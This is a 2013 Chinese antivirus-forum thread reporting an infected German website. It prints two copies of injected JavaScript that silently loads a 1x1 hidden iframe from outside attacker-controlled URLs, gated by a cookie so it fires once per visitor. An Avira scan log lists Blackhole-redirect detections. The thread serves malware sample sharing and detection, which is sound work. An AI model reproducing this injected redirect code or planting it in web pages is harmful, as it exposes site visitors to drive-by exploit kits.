查看: 828|回复: 1
收起左侧

[已鉴定] http://www.icehorse2010.de/?tag=training

[复制链接]
fireold
发表于 2013-7-14 07:32:44 | 显示全部楼层 |阅读模式
  1. function zzzfff() {
  2.      var amw = document.createElement('iframe');

  3.      amw.src = 'http://atamaral.com/_js/count.php';
  4.      amw.style.position = 'absolute';
  5.      amw.style.border = '0';
  6.      amw.style.height = '1px';
  7.      amw.style.width = '1px';
  8.      amw.style.left = '1px';
  9.      amw.style.top = '1px';

  10.      if (!document.getElementById('amw')) {
  11.          document.write('<div id=\'amw\'></div>');
  12.          document.getElementById('amw').appendChild(amw);
  13.      }
  14. }

  15. function SetCookie(cookieName, cookieValue, nDays, path) {
  16.      var today = new Date();
  17.      var expire = new Date();
  18.      if (nDays == null || nDays == 0) nDays = 1;
  19.      expire.setTime(today.getTime() + 3600000 * 24 * nDays);
  20.      document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
  21. }

  22. function GetCookie(name) {
  23.      var start = document.cookie.indexOf(name + "=");
  24.      var len = start + name.length + 1;
  25.      if ((!start) && (name != document.cookie.substring(0, name.length))) {
  26.          return null;
  27.      }
  28.      if (start == -1) return null;
  29.      var end = document.cookie.indexOf(";", len);
  30.      if (end == -1) end = document.cookie.length;
  31.      return unescape(document.cookie.substring(len, end));
  32. }
  33. if (navigator.cookieEnabled) {
  34.      if (GetCookie('visited_uq') == 55) {} else {
  35.          SetCookie('visited_uq', '55', '1', '/');

  36.          zzzfff();
  37.      }
  38. }
复制代码

  1. function zzzfff() {
  2.      var xz = document.createElement('iframe');

  3.      xz.src = 'http://peter.neish.net/wp-content/plugins/customize-admin/1pRwYO9W.php';
  4.      xz.style.position = 'absolute';
  5.      xz.style.border = '0';
  6.      xz.style.height = '1px';
  7.      xz.style.width = '1px';
  8.      xz.style.left = '1px';
  9.      xz.style.top = '1px';

  10.      if (!document.getElementById('xz')) {
  11.          document.write('<div id=\'xz\'></div>');
  12.          document.getElementById('xz').appendChild(xz);
  13.      }
  14. }

  15. function SetCookie(cookieName, cookieValue, nDays, path) {
  16.      var today = new Date();
  17.      var expire = new Date();
  18.      if (nDays == null || nDays == 0) nDays = 1;
  19.      expire.setTime(today.getTime() + 3600000 * 24 * nDays);
  20.      document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
  21. }

  22. function GetCookie(name) {
  23.      var start = document.cookie.indexOf(name + "=");
  24.      var len = start + name.length + 1;
  25.      if ((!start) && (name != document.cookie.substring(0, name.length))) {
  26.          return null;
  27.      }
  28.      if (start == -1) return null;
  29.      var end = document.cookie.indexOf(";", len);
  30.      if (end == -1) end = document.cookie.length;
  31.      return unescape(document.cookie.substring(len, end));
  32. }
  33. if (navigator.cookieEnabled) {
  34.      if (GetCookie('visited_uq') == 55) {} else {
  35.          SetCookie('visited_uq', '55', '1', '/');

  36.          zzzfff();
  37.      }
  38. }
复制代码


Avira
2013/7/14 上午 07:22 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\AVPGMUFA\jquery.popupWindow[1].js'
      包含病毒或有害的程式 'JS/BlacoleRef.W.320' [virus]
      已採取動作:
      檔案會移動至 '771e36ee.qua' 名稱底下的隔離區目錄。.

2013/7/14 上午 07:22 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\AVPGMUFA\jquery.tools.min[1].js'
      包含病毒或有害的程式 'JS/BlacoleRef.W.320' [virus]
      已採取動作:
      檔案會移動至 '5a4419a3.qua' 名稱底下的隔離區目錄。.

2013/7/14 上午 07:22 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\E84PIVG0\AC_RunActiveContent[2].js'
      包含病毒或有害的程式 'JS/BlacoleRef.W.320' [virus]
      已採取動作:
      檔案會移動至 '433a22eb.qua' 名稱底下的隔離區目錄。.

2013/7/14 上午 07:22 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\AVPGMUFA\jquery.jqprint.0.3[1].js'
      包含病毒或有害的程式 'JS/BlacoleRef.W.320' [virus]
      已採取動作:
      檔案會移動至 '0b0676be.qua' 名稱底下的隔離區目錄。.

2013/7/14 上午 07:22 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\6IHTB3IO\jquery.validMe[1].js'
      包含病毒或有害的程式 'JS/BlacoleRef.W.320' [virus]
      已採取動作:
      檔案會移動至 '7d2145ab.qua' 名稱底下的隔離區目錄。.

2013/7/14 上午 07:22 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\6IHTB3IO\jquery.validationEngine[1].js'
      包含病毒或有害的程式 'JS/BlacoleRef.W.320' [virus]
      已採取動作:
      檔案會移動至 '38a56895.qua' 名稱底下的隔離區目錄。.

2013/7/14 上午 07:22 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\6IHTB3IO\popup[1].js'
      包含病毒或有害的程式 'JS/BlacoleRef.W.320' [virus]
      已採取動作:
      檔案會移動至 '47b95afa.qua' 名稱底下的隔離區目錄。.

2013/7/14 上午 07:22 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\E84PIVG0\jquery.dimensions[2].js'
      包含病毒或有害的程式 'JS/BlacoleRef.W.320' [virus]
      已採取動作:
      檔案會移動至 '2f700e09.qua' 名稱底下的隔離區目錄。.

2013/7/14 上午 07:22 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描。]。
      檔案數:        797
      目錄數:        0
      惡意程式碼數:        14
      警告數:        0

2013/7/14 上午 07:22 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\6IHTB3IO\icehorse2010_de[1].htm'
      包含病毒或有害的程式 'JS/EXP.Redir.EL.7' [virus]
      已採取動作:
      發生錯誤,檔案未刪除。錯誤識別碼:26003.
      檔案無法刪除!.
      嘗試使用 ARK 程式庫執行動作。.
      檔案會移動至 '4959560f.qua' 名稱底下的隔離區目錄。.

2013/7/14 上午 07:22 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\6IHTB3IO\jquery.metadata[1].js'
      包含病毒或有害的程式 'JS/BlacoleRef.W.320' [virus]
      已採取動作:
      檔案會移動至 '1b160a69.qua' 名稱底下的隔離區目錄。.

2013/7/14 上午 07:22 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\MQPF1KDL\signs-banners[1].htm'
      包含病毒或有害的程式 'JS/BlacoleRef.CZ.29' [virus]
      已採取動作:
      檔案會移動至 '1cef7aba.qua' 名稱底下的隔離區目錄。.

2013/7/14 上午 07:22 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\E84PIVG0\jquery.nivo.slider[1].js'
      包含病毒或有害的程式 'JS/BlacoleRef.W.320' [virus]
      已採取動作:
      檔案會移動至 '5ec9379c.qua' 名稱底下的隔離區目錄。.

2013/7/14 上午 07:22 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\MQPF1KDL\jquery.main[1].js'
      包含病毒或有害的程式 'JS/BlacoleRef.W.320' [virus]
      已採取動作:
      檔案會移動至 '50d3075b.qua' 名稱底下的隔離區目錄。.

2013/7/14 上午 07:22 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\MQPF1KDL\jquery.validationEngine-it[1].js'
      包含病毒或有害的程式 'JS/BlacoleRef.W.320' [virus]
      已採取動作:
      檔案會移動至 '15fa7e19.qua' 名稱底下的隔離區目錄。.

2013/7/14 上午 07:21 [Safe Browsing] 封鎖的網頁
      Safe Browsing 封鎖了網頁 http://3xindiansex.com/st/css/js/jq-footer.js。此網頁因 色情
      而封鎖。使用者 vardon 有存取此網頁。

2013/7/14 上午 07:21 [Safe Browsing] 封鎖的網頁
      Safe Browsing 封鎖了網頁 http://xxxindianxxx.com/st/css/jquery-1.6.5.min.js。此網頁因 色情
      而封鎖。使用者 vardon 有存取此網頁。

2013/7/14 上午 07:21 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\6IHTB3IO\icehorse2010_de[1].htm 中
      偵測到病毒或有害的程式 'JS/EXP.Redir.EL.7 [virus]'
      執行的動作:傳輸至掃描程式

2013/7/14 上午 07:21 [Web Protection] 發現惡意程式碼
      從 URL "http://www.icehorse2010.de/?tag=training" 存取資料時,
      發現病毒或有害的程式 'JS/EXP.Redir.EL.7' [virus]。
      已採取動作:已略過


fs miss
fs5.jpg
One_self
发表于 2013-7-14 13:44:09 | 显示全部楼层
QQ截图20130714134310.jpg
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-2-3 17:59 , Processed in 0.127797 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表